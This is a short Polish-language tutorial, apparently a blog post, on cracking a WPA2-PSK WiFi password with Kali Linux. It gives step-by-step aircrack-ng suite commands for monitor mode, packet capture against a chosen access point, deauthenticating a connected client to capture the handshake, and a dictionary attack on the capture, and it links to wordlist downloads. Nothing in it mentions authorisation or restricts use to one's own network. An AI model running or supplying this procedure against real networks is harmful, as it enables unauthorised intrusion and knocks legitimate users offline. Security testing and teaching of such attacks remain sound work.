Łamanie hasła do sieci bezprzewodowej WiFi WPA2-PSK

W celu złamania hasła do sieci WiFi wykorzystany został w tym przypadku system Kali Linux w wersji 2025.2 oraz karta sieciowa Intel Dual Band Wireless-AC 8265.

W skrócie oto lista kroków jakie trzeba wykonać:

  1. Zainstalowanie poprawnego sterownika karty sieciowej;
  2. Ustawienie karty sieciowej  w tryb monitorowania;
  3. Rozpoczęcie przechwytywania pakietów;
  4. Rozłączenie klienta, który jest aktualnie podłączony do sieci w celu jego ponownego połączenia i przechwycenia w ten sposób pakietów autoryzacyjnych;
  5. Wyłączenie trybu monitorowania karty sieciowej;
  6. Rozkodowanie hasła z przechwyconych pakietów (z pliku z rozszerzeniem .cap);

Skonfigurowanie karty w tryb monitorowania

airmon-ng check
airmon-ng check kill
airmon-ng start wlan0

Airmon utworzy nowy interfejs sieciowy, w tym przypadku o nazwie wlan0mon. Do wyświetlenia wszystkich interfejsów bezprzewodowych służy polecenie iwconfig.

Wyświetlenie wszystkich sieci bezprzewodowych w pobliżu

airodump-ng wlan0mon

Rozpoczęcie przechwytywania pakietów do pliku capture_file

airodump-ng wlan0mon --bssid MAC_ADDRESS_OF_AP_HERE -c CHANNEL_NUMBER_HERE -w ./capture_file

Rozłączenie aktualnie podłączonego klienta w celu przechwycenia pakietów handshake – nawiązujących połączenie:

aireplay-ng wlan0mon --deauth NUMBER_OF_PACKETS_EGZAPLE_20 -a MAC_ADDRESS_OF_AP_HERE -h MAC_ADDRESS_OF_COMPUTER_CONNECTED_TO_NETWORK_HERE

Po wyświetleniu napisu WPA handshake: MAC_ADDRESS_OF_AP można zakończyć przechwytywanie pakietów.

Łamanie hasła za pomocą narzędzia aircrack-ng

aircrack-ng -w FILE_WITCH_WORDLIST wpa2-01.cap

Wyłączenie trybu monitorowania karty sieciowej

airmon-ng stop wlan0mon

Restart serwisu

service network-manager start

 

Listy słownikowe do łamania haseł metodą bruteforce można pobrać pod adresem:

https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html